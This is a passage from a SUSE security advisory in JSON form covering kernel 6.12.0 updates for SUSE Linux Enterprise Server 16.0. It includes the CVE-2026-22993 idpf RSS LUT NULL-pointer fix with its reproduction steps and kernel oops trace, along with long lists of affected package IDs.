"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
